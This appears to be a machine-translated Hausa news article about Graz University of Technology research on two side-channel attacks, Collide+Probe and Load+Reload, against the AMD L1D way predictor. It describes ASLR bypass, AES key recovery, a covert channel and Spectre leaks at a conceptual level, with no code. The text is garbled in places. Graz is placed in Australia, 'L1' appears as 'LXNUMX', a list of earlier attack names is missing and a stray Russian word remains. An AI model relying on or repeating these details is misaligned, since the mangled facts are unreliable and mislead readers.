Ƙungiyar masu bincike daga Jami'ar Fasaha ta Graz (Ostiraliya), wanda aka sani a baya don haɓaka hanyoyin kai hari , , и , gudanar da bincike a cikin hardware ingantawa musamman ga AMD sarrafawa da sabbin hanyoyi guda biyu na hare-haren tashoshi na gefe waɗanda ke sarrafa leaks ɗin bayanai yayin aikin aikin tsinkayar tashar tashar LXNUMX na masu sarrafa AMD. Ana iya amfani da dabarun don rage tasirin kariya ta ASLR, dawo da maɓalli a cikin aiwatar da AES masu rauni, da haɓaka tasirin harin Specter.
An gano matsaloli a cikin aiwatar da tsarin tsinkayar tashar (hanyar tsinkaya) a cikin ma'ajin bayanan matakin farko na CPU (L1D), wanda aka yi amfani da shi don yin hasashen wane tashar cache ya ƙunshi wani adireshin ƙwaƙwalwar ajiya. Haɓakawa da ake amfani da su a cikin na'urori na AMD ya dogara ne akan duba μ-tags (μTag). Ana ƙididdige μTag ta hanyar amfani da takamaiman aikin hash zuwa adireshin kama-da-wane. Yayin aiki, injin tsinkayar tashar yana amfani da μTag don ƙayyade tashar cache daga tebur. Don haka, μTag yana ba mai sarrafawa damar iyakance kansa don samun dama ga takamaiman tashar kawai, ba tare da bincika duk zaɓuɓɓuka ba, wanda ke rage yawan kuzarin CPU.
A lokacin aikin injiniya na baya na aiwatar da tsarin tsinkayar tashar a cikin ƙarni daban-daban na na'urori na AMD waɗanda aka saki daga 2011 zuwa 2019, an gano sabbin fasahohin kai hari ta tashar tashoshi biyu:
- Collide+Probe - yana bawa maharin damar bin hanyar ƙwaƙwalwar ajiya don tafiyar matakai da ke gudana akan ainihin CPU na ma'ana guda. Ma'anar hanyar ita ce amfani da adiresoshin kama-da-wane waɗanda ke haifar da karo a cikin aikin hash da ake amfani da su don ƙididdige μTag don bin hanyar samun ƙwaƙwalwar ajiya. Ba kamar hare-haren Flush+Reload da Prime+Probe da aka yi amfani da su akan na'urori masu sarrafa Intel ba, Collide+Probe baya amfani da ƙwaƙwalwar ajiya kuma yana aiki ba tare da sanin adiresoshin jiki ba.
- Load + Sake lodi - yana ba ku damar ƙayyade daidaitaccen alamun samun damar ƙwaƙwalwar ajiya akan ainihin CPU na zahiri. Hanyar ta dogara ne akan gaskiyar cewa tantanin ƙwaƙwalwa na jiki zai iya kasancewa a cikin ma'ajin L1D sau ɗaya kawai. Wadancan. samun damar ƙwaƙwalwar ajiyar ƙwaƙwalwar ajiya ɗaya a wani adireshin kama-da-wane na daban zai haifar da fitar da tantanin halitta daga ma'ajin L1D, yana ba da damar samun damar ƙwaƙwalwar ajiya. Ko da yake harin ya dogara ne akan ƙwaƙwalwar ajiyar da aka raba, baya fitar da layukan cache, yana ba da damar kai hare-hare na ɓoye waɗanda ba sa fitar da bayanai daga ma'ajiyar matakin ƙarshe.
Dangane da dabarun Collide+Probe da Load+Reload, masu bincike sun nuna yanayin harin tashoshi da yawa:
- Yiwuwar yin amfani da hanyoyin don tsara tashar sadarwa ta ɓoyayyiyar kai tsaye tsakanin matakai guda biyu, yana ba da damar canja wurin bayanai a cikin sauri har zuwa 588 kB a sakan daya.
- Yin amfani da karo a cikin μTag, yana yiwuwa a rage entropy don bambance-bambancen ASLR (Address Space Layout Randomization) da ketare kariyar ASLR a cikin kwaya akan tsarin Linux da aka sabunta gaba ɗaya. Yiwuwar kai hari don rage entropy ASLR duka daga aikace-aikacen mai amfani da amfani da lambar JavaScript da aka kashe a cikin yanayin sandbox da lambar da ke gudana a cikin wani yanayi na baƙi.
- Dangane da hanyar Collide+Probe, an aiwatar da wani hari don dawo da maɓallin ɓoyewa daga aiwatarwa mai rauni (dangane da ) boye-boye AES.
- Ta amfani da hanyar Collide+Probe azaman tashar sayan bayanai, harin Specter ya sami damar fitar da bayanan sirri daga kernel ba tare da amfani da ƙwaƙwalwar ajiya ba.
Rashin lahani yana faruwa akan na'urori na AMD dangane da microarchitectures
Bulldozer, Piledriver, Steamroller, Zen (Ryzen, Epic), Zen + da Zen2.
An sanar da AMD game da batun a kan Agusta 23, 2019, amma ya zuwa yanzu tare da bayani game da toshe raunin. A cewar masu binciken, ana iya toshe matsalar a matakin sabuntawar microcode ta hanyar samar da raƙuman MSR don zaɓin kashe tsarin tsinkayar tashar, kamar abin da Intel ya yi don sarrafa nakasa hanyoyin hasashen reshe.
source: budenet.ru